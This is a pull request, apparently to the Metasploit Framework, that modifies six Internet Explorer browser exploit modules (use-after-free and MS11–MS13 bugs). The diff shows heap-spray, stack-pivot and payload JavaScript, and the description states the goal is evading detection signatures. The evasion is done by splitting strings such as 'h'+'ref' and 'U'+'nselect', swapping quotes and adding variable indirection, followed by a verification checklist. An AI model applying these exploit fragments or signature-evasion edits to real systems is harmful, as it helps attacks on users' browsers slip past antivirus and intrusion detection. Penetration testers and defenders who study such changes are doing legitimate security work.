### PR TITLE
Browser exploit signature evasions

### DIFF
--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -178,9 +178,10 @@ class MetasploitModule < Msf::Exploit::Remote
       sparkle += unescape("AB");
       sparkle += unescape("#{js_payload}");
       magenta = unescape("#{align_esp}");
+      foo = "#{align_esp}";
       for (i=0; i < 0x70/4; i++) {
         if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
-        else               { magenta += unescape("#{align_esp}"); }
+        else               { magenta += unescape(foo); }
       }
       magenta += sparkle;
 
@@ -198,8 +199,8 @@ class MetasploitModule < Msf::Exploit::Remote
       f1.appendChild(document.createElement('table'));
       try      { f0.offsetParent=null;}
       catch(e) { }
-      f2.innerHTML = "";
-      f1.innerHTML = "";
+      f2.innerHTML = '';
+      f1.innerHTML = '';
       f0.appendChild(document.createElement('hr'));
       mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
     }

--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -264,7 +264,7 @@ for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); }
 var vlink = document.createElement("link");
 vlink.setAttribute("rel", "Stylesheet");
 vlink.setAttribute("type", "text/css");
-vlink.setAttribute("href", "#{placeholder}")
+vlink.setAttribute("h"+"ref", "#{placeholder}")
 document.getElementsByTagName("head")[0].appendChild(vlink);
 }
 EOS

--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -222,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
         var t = unescape;
         var d = Number(dword).toString(16);
         while (d.length < 8) d = '0' + d;
-        return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
+        return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 2+2));
       }
       function #{feng_shui_f}() {
         var tag = 0x1c1c1c0c;

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -228,7 +228,7 @@ function exploit(){
   }
 
   vml1.dashstyle.array.length = 0 - 1;
-  vml1.dashstyle.array.item(6) = 0x0c0c0c0c;
+  foo = vml1.dashstyle.array; foo.item(6) = 0x0c0c0c0c;
 
   for (var i=0; i<0x1000; i++)
   {

--- a/modules/exploits/windows/browser/ms13_055_canchor.rb
+++ b/modules/exploits/windows/browser/ms13_055_canchor.rb
@@ -156,10 +156,11 @@ class MetasploitModule < Msf::Exploit::Remote
       }
       p += unescape("#{js_payload}");
 
-      fo = unescape("#{js_align}");
+      foo = "#{js_align}";
+      fo = unescape(foo);
       for (i=0; i < 28; i++) {
         if (i == 27) { fo += unescape("#{js_pivot}"); }
-        else         { fo += unescape("#{js_align}"); }
+        else         { fo += unescape(foo); }
       }
 
       fo += p;

--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -227,10 +227,11 @@ sprayHeap({shellcode:unescape("#{js_payload}")});
 
 var earth = document;
 var data = "";
+var foo = "%u4141%u4141";
 for (i=0; i<17; i++) {
   if (i==6)      { data += unescape("%u2020%u2030"); }
   else if (i==7) { data += unescape("%u2020%u2030"); }
-  else           { data += unescape("%u4141%u4141"); }
+  else           { data += unescape(foo); }
 }
 data += "\\u4141";
 
@@ -261,7 +262,7 @@ function kaiju() {
       }
     }
 
-    earth.execCommand("Unselect");
+    earth.execCommand("U"+"nselect");
 
     if (battleStation == true) {
       for (i=0; i < war.length; i++) {


### PR DESCRIPTION
This changeset focuses on string signatures for a number of browser exploits.
The changes are minor since the signatures are brittle.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploits/windows/browser/ie_cgenericelement_uaf`
- [ ] **Verify** `f1.innerHTML = '';` is using a pair of single quotes and not double quotes & else               `{ magenta += unescape(foo); }` exists
- [ ] `use exploits/windows/browser/ms11_003_ie_css_import`
- [ ] **Verify** `vlink.setAttribute("h"+"ref", "#{placeholder}")` exists
- [ ] `use exploits/windows/browser/ms12_037_same_id`
- [ ] **Verify** `return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 2+2));` exists
- [ ] `use exploits/windows/browser/ms13_037_svg_dashstyle`
- [ ] **Verify** `foo = vml1.dashstyle.array; foo.item(6) = 0x0c0c0c0c;` exists
- [ ] `use exploits/windows/browser/ms13_055_canchor`
- [ ] **Verify** `else         { fo += unescape(foo); }` exists
- [ ] `use exploits/windows/browser/ms13_080_cdisplaypointer`
- [ ] **Verify** `else           { data += unescape(foo); }}` exists and `earth.execCommand("U"+"nselect");` exists


